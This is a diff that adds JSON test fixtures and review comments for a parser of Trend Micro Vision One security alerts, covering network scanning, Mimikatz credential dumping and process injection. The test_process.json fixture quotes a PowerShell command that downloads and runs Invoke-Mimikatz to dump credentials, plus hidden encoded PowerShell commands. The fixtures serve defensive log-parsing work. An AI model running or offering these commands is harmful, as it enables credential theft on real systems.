\"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": 
[{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": 
\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Internal Network Scanner", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509" + }, + "@timestamp": "2024-07-23T14:46:11Z", + "file": { + "directory": "C:\\Users\\doe.john\\Downloads", + "hash": { + "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + }, + "name": "Advanced_IP_Scanner_2.5.4594.1.exe", + "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" + }, + "host": { + "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", + "ip": [ + "1.2.3.4" + ], + "name": "doe10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631" + } + }, + "related": { + "hash": [ + "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "doe" + ] + }, + "rule": { + "name": "Internal Network 
Scanner" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "john", + "id": "john\\doe", + "name": "doe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json new file mode 100644 index 000000000..3c77d1afd --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json 
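Review bot: The expected block of this fixture pins that the `objectCmd` indicator (id 2, the Advanced_IP_Scanner command line) and the matched filter's `mitreTechniqueIds` (`T1046`) are dropped, while only `rule.name` plus the object path and hash survive; the same gap exists in test_process.json, where `objectCmd` (id 1) is the PowerShell download-and-execute line. For triage those two are the fields an analyst reads first, so I would extend the parser and this fixture with `"threat": { "technique": { "id": ["T1046"] } }` and carry the object command line under the `trendmicro.vision_one` namespace the fixture already uses. Note that test_process.json carries the technique ids with a version prefix (`V9.T1003.001`), so a mapping would have to accept both forms. If dropping these is deliberate, a short note in the parser's documentation saying so would save the next reader the check; the parser itself is not in this diff, so this is inferred from the fixtures alone.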
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], 
\"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": 
[\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", 
\"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows 
update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Credential Dumping via Mimikatz", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision 
One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "parent": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x" + } + }, + "related": { + "hash": [ + "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + ], + "ip": [ + "10.10.58.51" + ], + "user": [ + "sam" + ] + }, + "rule": { + "name": "Credential Dumping via Mimikatz" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00023", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "domain": "shockwave", + "id": "shockwave\\sam", + "name": "sam" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json new file mode 100644 index 000000000..a95ac7fc8 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json 
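Review bot: `@timestamp` in the expected block is taken from `createdDateTime` (`2022-09-06T02:49:30Z`), while the matched telemetry event in the input occurred almost a day earlier (`matchedDateTime` `2022-09-05T03:53:57.199Z`) and that time is not asserted anywhere in the output. For timeline and detection work the observed time matters more than the alert-creation time, so I would have the parser surface it and pin it here as `"start": "2022-09-05T03:53:57.199Z"` under `event`, keeping `@timestamp` as the alert creation time. Likewise the numeric `score` (64) only survives inside the echoed message; if the parser maps it, `"severity": 64` under `event` would make the fixture assert it. Both points are inferred from the fixture since the parser is not part of this diff.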
@@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": 
\"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": 
[\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", 
\"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", 
